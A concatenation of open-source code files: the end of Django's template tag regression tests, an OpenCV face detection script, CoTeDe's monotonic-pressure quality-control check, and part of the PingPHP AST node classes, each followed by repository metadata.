'with-error02': ('{% with dict.key as %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, template.TemplateSyntaxError),
### NOW TAG ########################################################
# Simple case
'now01': ('{% now "j n Y" %}', {}, "%d %d %d" % (
datetime.now().day, datetime.now().month, datetime.now().year)),
# Check parsing of locale strings
'now02': ('{% now "DATE_FORMAT" %}', {}, date_format(datetime.now())),
# Also accept simple quotes - #15092
'now03': ("{% now 'j n Y' %}", {}, "%d %d %d" % (
datetime.now().day, datetime.now().month, datetime.now().year)),
'now04': ("{% now 'DATE_FORMAT' %}", {}, date_format(datetime.now())),
'now05': ('''{% now 'j "n" Y'%}''', {}, '''%d "%d" %d''' % (
datetime.now().day, datetime.now().month, datetime.now().year)),
'now06': ('''{% now "j 'n' Y"%}''', {}, '''%d '%d' %d''' % (
datetime.now().day, datetime.now().month, datetime.now().year)),
### URL TAG ########################################################
# Successes
'url01': ('{% url "regressiontests.templates.views.client" client.id %}', {'client': {'id': 1}}, '/url_tag/client/1/'),
'url02': ('{% url "regressiontests.templates.views.client_action" id=client.id action="update" %}', {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02a': ('{% url "regressiontests.templates.views.client_action" client.id "update" %}', {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02b': ("{% url 'regressiontests.templates.views.client_action' id=client.id action='update' %}", {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url02c': ("{% url 'regressiontests.templates.views.client_action' client.id 'update' %}", {'client': {'id': 1}}, '/url_tag/client/1/update/'),
'url03': ('{% url "regressiontests.templates.views.index" %}', {}, '/url_tag/'),
'url04': ('{% url "named.client" client.id %}', {'client': {'id': 1}}, '/url_tag/named-client/1/'),
'url05': ('{% url "метка_оператора" v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url06': ('{% url "метка_оператора_2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url07': ('{% url "regressiontests.templates.views.client2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url08': ('{% url "метка_оператора" v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url09': ('{% url "метка_оператора_2" tag=v %}', {'v': 'Ω'}, '/url_tag/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/'),
'url10': ('{% url "regressiontests.templates.views.client_action" id=client.id action="two words" %}', {'client': {'id': 1}}, '/url_tag/client/1/two%20words/'),
'url11': ('{% url "regressiontests.templates.views.client_action" id=client.id action="==" %}', {'client': {'id': 1}}, '/url_tag/client/1/==/'),
'url12': ('{% url "regressiontests.templates.views.client_action" id=client.id action="," %}', {'client': {'id': 1}}, '/url_tag/client/1/,/'),
'url13': ('{% url "regressiontests.templates.views.client_action" id=client.id action=arg|join:"-" %}', {'client': {'id': 1}, 'arg':['a','b']}, '/url_tag/client/1/a-b/'),
'url14': ('{% url "regressiontests.templates.views.client_action" client.id arg|join:"-" %}', {'client': {'id': 1}, 'arg':['a','b']}, '/url_tag/client/1/a-b/'),
'url15': ('{% url "regressiontests.templates.views.client_action" 12 "test" %}', {}, '/url_tag/client/12/test/'),
'url18': ('{% url "regressiontests.templates.views.client" "1,2" %}', {}, '/url_tag/client/1,2/'),
'url19': ('{% url named_url client.id %}', {'named_url': 'regressiontests.templates.views.client', 'client': {'id': 1}}, '/url_tag/client/1/'),
'url20': ('{% url url_name_in_var client.id %}', {'url_name_in_var': 'named.client', 'client': {'id': 1}}, '/url_tag/named-client/1/'),
# Failures
'url-fail01': ('{% url %}', {}, template.TemplateSyntaxError),
'url-fail02': ('{% url "no_such_view" %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail03': ('{% url "regressiontests.templates.views.client" %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail04': ('{% url "view" id, %}', {}, template.TemplateSyntaxError),
'url-fail05': ('{% url "view" id= %}', {}, template.TemplateSyntaxError),
'url-fail06': ('{% url "view" a.id=id %}', {}, template.TemplateSyntaxError),
'url-fail07': ('{% url "view" a.id!id %}', {}, template.TemplateSyntaxError),
'url-fail08': ('{% url "view" id="unterminatedstring %}', {}, template.TemplateSyntaxError),
'url-fail09': ('{% url "view" id=", %}', {}, template.TemplateSyntaxError),
'url-fail11': ('{% url named_url %}', {}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail12': ('{% url named_url %}', {'named_url': 'no_such_view'}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail13': ('{% url named_url %}', {'named_url': 'regressiontests.templates.views.client'}, (urlresolvers.NoReverseMatch, urlresolvers.NoReverseMatch)),
'url-fail14': ('{% url named_url id, %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail15': ('{% url named_url id= %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail16': ('{% url named_url a.id=id %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail17': ('{% url named_url a.id!id %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail18': ('{% url named_url id="unterminatedstring %}', {'named_url': 'view'}, template.TemplateSyntaxError),
'url-fail19': ('{% url named_url id=", %}', {'named_url': 'view'}, template.TemplateSyntaxError),
# {% url ... as var %}
'url-asvar01': ('{% url "regressiontests.templates.views.index" as url %}', {}, ''),
'url-asvar02': ('{% url "regressiontests.templates.views.index" as url %}{{ url }}', {}, '/url_tag/'),
'url-asvar03': ('{% url "no_such_view" as url %}{{ url }}', {}, ''),
### CACHE TAG ######################################################
'cache03': ('{% load cache %}{% cache 2 test %}cache03{% endcache %}', {}, 'cache03'),
'cache04': ('{% load cache %}{% cache 2 test %}cache04{% endcache %}', {}, 'cache03'),
'cache05': ('{% load cache %}{% cache 2 test foo %}cache05{% endcache %}', {'foo': 1}, 'cache05'),
'cache06': ('{% load cache %}{% cache 2 test foo %}cache06{% endcache %}', {'foo': 2}, 'cache06'),
'cache07': ('{% load cache %}{% cache 2 test foo %}cache07{% endcache %}', {'foo': 1}, 'cache05'),
# Allow first argument to be a variable.
'cache08': ('{% load cache %}{% cache time test foo %}cache08{% endcache %}', {'foo': 2, 'time': 2}, 'cache06'),
# Raise exception if we don't have at least 2 args, first one integer.
'cache11': ('{% load cache %}{% cache %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache12': ('{% load cache %}{% cache 1 %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache13': ('{% load cache %}{% cache foo bar %}{% endcache %}', {}, template.TemplateSyntaxError),
'cache14': ('{% load cache %}{% cache foo bar %}{% endcache %}', {'foo': 'fail'}, template.TemplateSyntaxError),
'cache15': ('{% load cache %}{% cache foo bar %}{% endcache %}', {'foo': []}, template.TemplateSyntaxError),
# Regression test for #7460.
'cache16': ('{% load cache %}{% cache 1 foo bar %}{% endcache %}', {'foo': 'foo', 'bar': 'with spaces'}, ''),
# Regression test for #11270.
'cache17': ('{% load cache %}{% cache 10 long_cache_key poem %}Some Content{% endcache %}', {'poem': 'Oh freddled gruntbuggly/Thy micturations are to me/As plurdled gabbleblotchits/On a lurgid bee/That mordiously hath bitled out/Its earted jurtles/Into a rancid festering/Or else I shall rend thee in the gobberwarts with my blurglecruncheon/See if I dont.'}, 'Some Content'),
### AUTOESCAPE TAG ##############################################
'autoescape-tag01': ("{% autoescape off %}hello{% endautoescape %}", {}, "hello"),
'autoescape-tag02': ("{% autoescape off %}{{ first }}{% endautoescape %}", {"first": "<b>hello</b>"}, "<b>hello</b>"),
'autoescape-tag03': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": "<b>hello</b>"}, "<b>hello</b>"),
# Autoescape disabling and enabling nest in a predictable way.
'autoescape-tag04': ("{% autoescape off %}{{ first }} {% autoescape on%}{{ first }}{% endautoescape %}{% endautoescape %}", {"first": "<a>"}, "<a> <a>"),
'autoescape-tag05': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": "<b>first</b>"}, "<b>first</b>"),
# Strings (ASCII or unicode) already marked as "safe" are not
# auto-escaped
'autoescape-tag06': ("{{ first }}", {"first": mark_safe("<b>first</b>")}, "<b>first</b>"),
'autoescape-tag07': ("{% autoescape on %}{{ first }}{% endautoescape %}", {"first": mark_safe("<b>Apple</b>")}, "<b>Apple</b>"),
# Literal string arguments to filters, if used in the result, are
# safe.
'autoescape-tag08': (r'{% autoescape on %}{{ var|default_if_none:" endquote\" hah" }}{% endautoescape %}', {"var": None}, ' endquote" hah'),
# Objects which return safe strings as their __unicode__ method
# won't get double-escaped.
'autoescape-tag09': (r'{{ unsafe }}', {'unsafe': filters.UnsafeClass()}, 'you & me'),
'autoescape-tag10': (r'{{ safe }}', {'safe': filters.SafeClass()}, 'you > me'),
# The "safe" and "escape" filters cannot work due to internal
# implementation details (fortunately, the (no)autoescape block
# tags can be used in those cases)
'autoescape-filtertag01': ("{{ first }}{% filter safe %}{{ first }} x<y{% endfilter %}", {"first": "<a>"}, template.TemplateSyntaxError),
# ifqeual compares unescaped vales.
'autoescape-ifequal01': ('{% ifequal var "this & that" %}yes{% endifequal %}', { "var": "this & that" }, "yes"),
# Arguments to filters are 'safe' and manipulate their input unescaped.
'autoescape-filters01': ('{{ var|cut:"&" }}', { "var": "this & that" }, "this that" ),
'autoescape-filters02': ('{{ var|join:" & \" }}', { "var": ("Tom", "Dick", "Harry") }, "Tom & Dick & Harry"),
# Literal strings are safe.
'autoescape-literals01': ('{{ "this & that" }}',{}, "this & that"),
# Iterating over strings outputs safe characters.
'autoescape-stringiterations01': ('{% for l in var %}{{ l }},{% endfor %}', {'var': 'K&R'}, "K,&,R,"),
# Escape requirement survives lookup.
'autoescape-lookup01': ('{{ var.key }}', { "var": {"key": "this & that" }}, "this & that"),
# Static template tags
'static-prefixtag01': ('{% load static %}{% get_static_prefix %}', {}, settings.STATIC_URL),
'static-prefixtag02': ('{% load static %}{% get_static_prefix as static_prefix %}{{ static_prefix }}', {}, settings.STATIC_URL),
'static-prefixtag03': ('{% load static %}{% get_media_prefix %}', {}, settings.MEDIA_URL),
'static-prefixtag04': ('{% load static %}{% get_media_prefix as media_prefix %}{{ media_prefix }}', {}, settings.MEDIA_URL),
'static-statictag01': ('{% load static %}{% static "admin/base.css" %}', {}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag02': ('{% load static %}{% static base_css %}', {'base_css': 'admin/base.css'}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag03': ('{% load static %}{% static "admin/base.css" as foo %}{{ foo }}', {}, urljoin(settings.STATIC_URL, 'admin/base.css')),
'static-statictag04': ('{% load static %}{% static base_css as foo %}{{ foo }}', {'base_css': 'admin/base.css'}, urljoin(settings.STATIC_URL, 'admin/base.css')),
# Verbatim template tag outputs contents without rendering.
'verbatim-tag01': ('{% verbatim %}{{bare }}{% endverbatim %}', {}, '{{bare }}'),
'verbatim-tag02': ('{% verbatim %}{% endif %}{% endverbatim %}', {}, '{% endif %}'),
'verbatim-tag03': ("{% verbatim %}It's the {% verbatim %} tag{% endverbatim %}", {}, "It's the {% verbatim %} tag"),
'verbatim-tag04': ('{% verbatim %}{% verbatim %}{% endverbatim %}{% endverbatim %}', {}, template.TemplateSyntaxError),
'verbatim-tag05': ('{% verbatim %}{% endverbatim %}{% verbatim %}{% endverbatim %}', {}, ''),
'verbatim-tag06': ("{% verbatim special %}Don't {% endverbatim %} just yet{% endverbatim special %}", {}, "Don't {% endverbatim %} just yet"),
}
return tests
class TemplateTagLoading(unittest.TestCase):
def setUp(self):
self.old_path = sys.path[:]
self.old_apps = settings.INSTALLED_APPS
self.egg_dir = '%s/eggs' % os.path.dirname(__file__)
self.old_tag_modules = template_base.templatetags_modules
template_base.templatetags_modules = []
def tearDown(self):
settings.INSTALLED_APPS = self.old_apps
sys.path = self.old_path
template_base.templatetags_modules = self.old_tag_modules
def test_load_error(self):
ttext = "{% load broken_tag %}"
self.assertRaises(template.TemplateSyntaxError, template.Template, ttext)
try:
template.Template(ttext)
except template.TemplateSyntaxError as e:
self.assertTrue('ImportError' in e.args[0])
self.assertTrue('Xtemplate' in e.args[0])
def test_load_error_egg(self):
ttext = "{% load broken_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
sys.path.append(egg_name)
settings.INSTALLED_APPS = ('tagsegg',)
self.assertRaises(template.TemplateSyntaxError, template.Template, ttext)
try:
template.Template(ttext)
except template.TemplateSyntaxError as e:
self.assertTrue('ImportError' in e.args[0])
self.assertTrue('Xtemplate' in e.args[0])
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
sys.path.append(egg_name)
settings.INSTALLED_APPS = ('tagsegg',)
t = template.Template(ttext)
class RequestContextTests(unittest.TestCase):
def setUp(self):
templates = {
'child': Template('{{ var|default:"none" }}'),
}
setup_test_template_loader(templates)
self.fake_request = RequestFactory().get('/')
def tearDown(self):
restore_template_loaders()
def test_include_only(self):
"""
Regression test for #15721, ``{% include %}`` and ``RequestContext``
not playing together nicely.
"""
ctx = RequestContext(self.fake_request, {'var': 'parent'})
self.assertEqual(
template.Template('{% include "child" %}').render(ctx),
'parent'
)
self.assertEqual(
template.Template('{% include "child" only %}').render(ctx),
'none'
)
|
{
"content_hash": "f3a4c9052a0b3a7ae955700aaeb7218c",
"timestamp": "",
"source": "github",
"line_count": 1699,
"max_line_length": 388,
"avg_line_length": 65.37257210123602,
"alnum_prop": 0.5152879317175064,
"repo_name": "aleida/django",
"id": "4aa71f97094e9328d1c1a965e6b44c7795a3f557",
"size": "111206",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/regressiontests/templates/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50207"
},
{
"name": "JavaScript",
"bytes": "89078"
},
{
"name": "Python",
"bytes": "8135526"
},
{
"name": "Shell",
"bytes": "11901"
}
],
"symlink_target": ""
}
|
import sys
import cv
import glob
def detect(image):
image_size = cv.GetSize(image)
# create grayscale version
grayscale = cv.CreateImage(image_size, 8, 1)
cv.CvtColor(image, grayscale, cv.CV_BGR2GRAY)
# create storage
storage = cv.CreateMemStorage(0)
# equalize histogram
cv.EqualizeHist(grayscale, grayscale)
# show processed image
#cv.ShowImage('Processed', grayscale)
# detect objects
cascade = cv.Load('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_alt.xml')
faces = cv.HaarDetectObjects(grayscale, cascade, storage, 1.2, 2, cv.CV_HAAR_DO_CANNY_PRUNING)
if faces:
for i in faces:
cv.Rectangle(image,
(i[0][0], i[0][1]),
(i[0][0] + i[0][2], i[0][1] + i[0][3]),
(0, 0, 255),
1,
8,
0)
print 'face detection by opencv2'
src = '../tests/images/*.jpg'
images = glob.glob(src)
for f in images:
print f
# create windows
cv.NamedWindow(f, cv.CV_WINDOW_AUTOSIZE)
#cv.NamedWindow('Processed', cv.CV_WINDOW_AUTOSIZE)
#read image
frame = cv.LoadImage(f)
# face detection
detect(frame)
# display image
cv.ShowImage(f, frame)
while 1:
# do forever
# handle events
k = cv.WaitKey(10)
if k == 0x1b: # ESC
print 'ESC pressed. Exiting ...'
break
|
{
"content_hash": "93adb8b6cccef496d24ecdafe2cb58d1",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 98,
"avg_line_length": 24.719298245614034,
"alnum_prop": 0.5862313697657914,
"repo_name": "masgari/peach",
"id": "8377c035ab41458934a4b739c7f6b0eef13f0b9b",
"size": "1409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "face-engine/test_learning/face_detect.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "165500"
},
{
"name": "JavaScript",
"bytes": "680768"
},
{
"name": "Python",
"bytes": "12182"
}
],
"symlink_target": ""
}
|
"""
8. Pressure increasing test
This test requires that the profile has pressures that are monotonically increasing (assuming the pressures are ordered from smallest to largest).
Action: If there is a region of constant pressure, all but the first of a consecutive set of constant pressures should be flagged as bad data. If there is a region where pressure reverses, all of the pressures in the reversed part of the profile should be flagged as bad data. All pressures flagged as bad data and all of the associated temperatures and salinities are removed from the TESAC distributed on the GTS.
"""
import logging
import numpy as np
from numpy import ma
from .qctests import QCCheckVar
module_logger = logging.getLogger(__name__)
class MonotonicZ(QCCheckVar):
"""Check if sensor vertical movement is monotonic
This is usually called Increasing Depth, Increasing Pressure ...
Most of the implementations define a stop or a invertion in the
verticalm movement as bad data.
cfg[coord, tolerance]
"""
coord = "depth"
def test(self):
"""
coord = depth
tolerance = 0.0
"""
self.flags = {}
if "coord" in self.cfg:
self.coord = self.cfg["coord"]
z = self[self.coord]
assert np.shape(self[self.varname]) == np.shape(z)
flag = np.zeros(self[self.varname].shape, dtype="i1")
dz = np.diff(z)
if np.all(dz > 0):
flag[:] = self.flag_good
else:
flag[0] = self.flag_good
zmax = z[0]
for i, zn in enumerate(z[1:], 1):
if zn > zmax:
zmax = zn
flag[i] = self.flag_good
else:
flag[i] = self.flag_bad
flag[ma.getmaskarray(z)] = 9
if "flag_name" in self.cfg:
flag_name = self.cfg["flag_name"]
else:
flag_name = "monotonic_{}".format(self.cfg["coord"].lower())
self.flags[flag_name] = flag
|
{
"content_hash": "9c9dc686472e7ba4a63351e20104e989",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 415,
"avg_line_length": 30.46268656716418,
"alnum_prop": 0.6046055854973053,
"repo_name": "castelao/CoTeDe",
"id": "636a42f2e9594d1354ec79e61f4753775709d29b",
"size": "2152",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cotede/qctests/monotonic_z.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "178847"
},
{
"name": "TeX",
"bytes": "2430"
}
],
"symlink_target": ""
}
|
'''
PingPHP AST nodes
'''
indentLevel = 0
outputString = []
def indent():
global indentLevel
indentLevel += 1
def outdent():
global indentLevel
indentLevel -= 1
def append(val):
global outputString
if isinstance(val, list):
outputString.extend(val)
else:
outputString.append(val)
def finishOutput():
global outputString
# printObj(outputString)
res = ''.join(outputString)
initOutput()
return res
def initOutput():
global outputString, indentLevel
indentLevel = 0
outputString = ['<?php', '\n']
def popStr():
global outputString
outputString.pop()
def popStrToLastNewLine():
while lastStr() != '\n':
popStr()
popStr()
def lastStr():
global outputString
return outputString[-1]
def indentSpaces():
global indentLevel
return ''.join([' ' for i in range(0, indentLevel)])
''' Node classes '''
class BaseNode(object):
def __init__(self, val):
self.val = val
def gen(self):
if self.val:
from .helper import isString
if isString(self.val):
append(self.val)
elif hasattr(self.val, 'gen'):
self.val.gen()
class WithTerminatorNode(BaseNode):
def __init__(self, val, terminator):
super(WithTerminatorNode, self).__init__(val)
self.terminator = terminator
class UnaryOperationNode(BaseNode):
def __init__(self, op, exp):
super(UnaryOperationNode, self).__init__(op)
self.exp = exp
def gen(self):
super(UnaryOperationNode, self).gen()
self.exp.gen()
class UnaryOperationWithSpaceNode(UnaryOperationNode):
def gen(self):
super(UnaryOperationWithSpaceNode, self).gen()
append(' ')
self.exp.gen()
class BinaryOperationNode(BaseNode):
def __init__(self, exp1, op, exp2):
super(BinaryOperationNode, self).__init__(op)
self.exp1 = exp1
self.exp2 = exp2
def gen(self):
self.exp1.gen()
append([' ', self.val, ' '])
self.exp2.gen()
class Root(BaseNode):
def gen(self):
initOutput()
super(Root, self).gen()
return finishOutput()
class Body(BaseNode):
def __init__(self, body, val):
self.body = body
super(Body, self).__init__(val)
def gen(self):
if self.body != None:
self.body.gen()
super(Body, self).gen()
'''
indent is Line's duty
'''
class Line(BaseNode):
def gen(self):
append(indentSpaces())
super(Line, self).gen()
append('\n')
class Embeded(BaseNode):
pass
class Statement(WithTerminatorNode):
def __init__(self, val, terminator):
super(Statement, self).__init__(val, terminator)
def gen(self):
super(Statement, self).gen()
if not self.val.val == '':
append('; ')
self.terminator.gen()
else:
popStrToLastNewLine()
class StatementWithoutTerminator(BaseNode):
pass
class StaticVarDef(BaseNode):
def __init__(self, id_, init):
super(StaticVarDef, self).__init__(id_)
self.init = init
def gen(self):
append('static $')
super(StaticVarDef, self).gen()
self.init.gen()
class JustStrStatement(WithTerminatorNode):
def __init__(self, val, args, terminator):
super(JustStrStatement, self).__init__(val, terminator)
self.args = args
def gen(self):
if not self.val == 'pass':
super(JustStrStatement, self).gen()
if self.args.val:
append(' ')
self.args.gen()
append('; ')
self.terminator.gen()
else:
popStrToLastNewLine()
class CodeBlock(BaseNode):
pass
class Expression(BaseNode):
pass
class ParentExp(BaseNode):
def gen(self):
append('(')
super(ParentExp, self).gen()
append(')')
class AccessObj(BaseNode):
def __init__(self, exp1, id_, exp2):
super(AccessObj, self).__init__(exp1)
self.id_ = id_
self.exp2 = exp2
def gen(self):
super(AccessObj, self).gen()
if self.id_:
append(['->', self.id_])
else:
append('[')
self.exp2 and self.exp2.gen()
append(']')
class Block(BaseNode):
def gen(self):
indent()
super(Block, self).gen()
outdent()
class InitModifier(BaseNode):
pass
class AssignRightSide(BaseNode):
def __init__(self, assign, exp):
super(AssignRightSide, self).__init__(assign)
self.exp = exp
def gen(self):
append(' ')
super(AssignRightSide, self).gen()
append(' ')
self.exp.gen()
class Value(BaseNode):
pass
class Literal(BaseNode):
pass
class SimpleLiteral(BaseNode):
pass
class ArrayLiteral(BaseNode):
def gen(self):
append('[')
super(ArrayLiteral, self).gen()
append(']')
class CommaList(BaseNode):
def __init__(self, list_, val):
super(CommaList, self).__init__(val)
self.list_ = list_
def gen(self):
if self.list_ != None:
self.list_.gen()
append(', ')
super(CommaList, self).gen()
class ArrayLiteralContentList(CommaList):
pass
class ArrayLiteralContent(BaseNode):
def __init__(self, key, val):
self.key = key
super(ArrayLiteralContent, self).__init__(val)
def gen(self):
if self.key != None:
self.key.gen()
append(' => ')
super(ArrayLiteralContent, self).gen()
class Varible(BaseNode):
def __init__(self, nsContentName, val):
self.nsContentName = nsContentName
super(Varible, self).__init__(val)
def gen(self, noDollar=False):
if self.nsContentName:
if isinstance(self.nsContentName, str):
append(self.nsContentName)
else:
self.nsContentName.gen()
append('::')
if isinstance(self.val, NsContentName):
self.val.list_ and self.val.list_.gen()
self.val = self.val.val
if self.val == '_':
return
if not (self.val.isupper() or self.val == 'class'):
noDollar or append('$')
super(Varible, self).gen()
class Assign(BaseNode):
def __init__(self, val, rightSide):
super(Assign, self).__init__(val)
self.rightSide = rightSide
def gen(self):
super(Assign, self).gen()
self.rightSide.gen()
class ArgList(CommaList):
pass
class Arg(BaseNode):
def __init__(self, exp, threeDot):
self.threeDot = threeDot
super(Arg, self).__init__(exp)
def gen(self):
self.threeDot and self.threeDot.gen()
super(Arg, self).gen()
class ParamList(CommaList):
pass
class ThreeDotModifier(BaseNode):
pass
class Param(BaseNode):
def __init__(self, ref, val, threeDot, type_, init):
self.ref = ref
super(Param, self).__init__(val)
self.threeDot = threeDot
self.type_ = type_
self.init = init
def gen(self):
self.type_.gen()
self.threeDot.gen()
self.ref.gen()
append('$')
super(Param, self).gen()
self.init.gen()
class TypeModifier(BaseNode):
def gen(self):
super(TypeModifier, self).gen()
self.val and append(' ')
class Call(BaseNode):
def __init__(self, val, args):
super(Call, self).__init__(val)
self.args = args
def gen(self):
super(Call, self).gen()
append('(')
self.args.gen()
append(')')
class Callable(BaseNode):
def __init__(self, val, id_):
super(Callable, self).__init__(val)
self.id_ = id_
def gen(self):
super(Callable, self).gen()
if self.id_:
append('::')
append(self.id_)
class Lambda(WithTerminatorNode):
def __init__(self, paramList, use, terminator, block):
super(Lambda, self).__init__(paramList, terminator)
self.use = use
self.block = block
def gen(self):
append('function (')
super(Lambda, self).gen()
append(') ')
self.use.gen()
append('{ ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class UseModifier(BaseNode):
def __init__(self, paramList):
super(UseModifier, self).__init__(paramList)
def gen(self):
if not self.val:
return
append('use (')
super(UseModifier, self).gen()
append(')')
class Terminator(BaseNode):
pass
class Namespace(BaseNode):
def gen(self):
append('namespace ')
super(Namespace, self).gen()
class UseNamespace(BaseNode):
def gen(self):
append('use ')
super(UseNamespace, self).gen()
class DefOrConstModifier(BaseNode):
def gen(self):
if not self.val:
return
if self.val == 'def':
self.val = 'function'
super(DefOrConstModifier, self).gen()
append(' ')
class NsContentName(BaseNode):
def __init__(self, list_, val):
super(NsContentName, self).__init__(val)
self.list_ = list_
def gen(self):
self.list_ and self.list_.gen()
super(NsContentName, self).gen()
class NsContentNameList(CommaList):
pass
class NsContentNameAsId(BaseNode):
def __init__(self, defOrConst, val, id_):
self.defOrConst = defOrConst
super(NsContentNameAsId, self).__init__(val)
self.id_ = id_
def gen(self):
self.defOrConst.gen()
super(NsContentNameAsId, self).gen()
self.id_ and append([' as ', self.id_])
class NsContentNameAsIdList(CommaList):
pass
class If(WithTerminatorNode):
def __init__(self, val, elseBlock, terminator):
super(If, self).__init__(val, terminator)
self.elseBlock = elseBlock
def gen(self):
super(If, self).gen()
if self.elseBlock:
append(' else { ')
self.terminator.gen()
append('\n')
self.elseBlock.gen()
append([indentSpaces(), '}'])
class IfBlock(WithTerminatorNode):
def __init__(self, list_, exp, terminator, block):
super(IfBlock, self).__init__(exp, terminator)
self.list_ = list_
self.block = block
def gen(self):
if self.list_ != None:
self.list_.gen()
append(' else if (')
else:
append('if (')
super(IfBlock, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class Switch(WithTerminatorNode):
def __init__(self, exp, terminator, content):
super(Switch, self).__init__(exp, terminator)
self.content = content
def gen(self):
append('switch (')
super(Switch, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class SwitchContent(Block):
pass
class InSwitchDefList(Body):
pass
class InSwitchDef(Line):
pass
class Case(WithTerminatorNode):
def __init__(self, case, valueList, terminator, block):
super(Case, self).__init__(case, terminator)
self.valueList = valueList
self.block = block
def gen(self):
if self.val == 'case':
valueList = []
while (self.valueList):
valueList.append(self.valueList.val)
self.valueList = self.valueList.list_
valueList.reverse()
popStr()
for value in valueList:
append([indentSpaces(), 'case '])
value.gen()
append([': ', '\n'])
popStr()
self.terminator.gen()
append('\n')
self.block.gen()
indent()
append([indentSpaces(), 'break; ', '\n'])
outdent()
else:
append('default: ')
self.terminator.gen()
append('\n')
self.block.gen()
popStr()
class For(WithTerminatorNode):
def __init__(self, exp1, exp2, exp3, terminator, block):
super(For, self).__init__(exp3, terminator)
self.exp1 = exp1
self.exp2 = exp2
self.block = block
def gen(self):
append('foreach (')
super(For, self).gen()
append(' as ')
self.exp1.gen()
if self.exp2:
append(' => ')
self.exp2.gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class While(WithTerminatorNode):
def __init__(self, exp, terminator, block):
super(While, self).__init__(exp, terminator)
self.block = block
def gen(self):
append('while (')
super(While, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class DoWhile(WithTerminatorNode):
def __init__(self, term1, block, cmtOrEptList, exp, term2):
super(DoWhile, self).__init__(exp, term1)
self.block = block
self.term2 = term2
self.cmtOrEptList = cmtOrEptList
def gen(self):
append('do { ')
self.terminator.gen()
append('\n')
self.block.gen()
indent()
self.cmtOrEptList.gen()
outdent()
append([indentSpaces(), '} while('])
super(DoWhile, self).gen()
append('); ')
self.term2.gen()
class CommentOrEmptyLineList(Body):
pass
class Declare(BaseNode):
def __init__(self, id_, exp):
super(Declare, self).__init__(id_)
self.exp = exp
def gen(self):
append('declare(')
super(Declare, self).gen()
append(' = ')
self.exp.gen()
append(')')
class CommentOrEmptyLine(Line):
pass
class Try(WithTerminatorNode):
def __init__(self, tryTerm, tryBlock, catch, finTerm, finBlock):
super(Try, self).__init__(tryBlock, tryTerm)
self.catch = catch
self.finTerm = finTerm
self.finBlock = finBlock
def gen(self):
append('try { ')
self.terminator.gen()
append('\n')
super(Try, self).gen()
append([indentSpaces(), '} '])
self.catch.gen()
if self.finTerm:
append('finally { ')
self.finTerm.gen()
append('\n')
self.finBlock.gen()
append([indentSpaces(), '}'])
class Catch(WithTerminatorNode):
def __init__(self, catch, var, className, terminator, block):
super(Catch, self).__init__(var, terminator)
self.catch = catch
self.className = className
self.block = block
def gen(self):
if self.catch:
self.catch.gen()
append('catch (')
self.className.gen()
append(' ')
super(Catch, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '} '])
class Class(WithTerminatorNode):
def __init__(self, abstract, final, id_, extends, implements, terminator, content):
self.abstract = abstract
self.final = final
super(Class, self).__init__(id_, terminator)
self.extends = extends
self.implements = implements
self.content = content
def gen(self):
self.abstract.gen()
self.final.gen()
append('class ')
super(Class, self).gen()
self.extends.gen()
self.implements.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class AnonymousClass(WithTerminatorNode):
def __init__(self, argList, extends, implements, termiantor, content):
super(AnonymousClass, self).__init__(argList, termiantor)
self.extends = extends
self.implements = implements
self.content = content
def gen(self):
append('new class (')
super(AnonymousClass, self).gen()
append(')')
self.extends.gen()
self.implements.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class Trait(WithTerminatorNode):
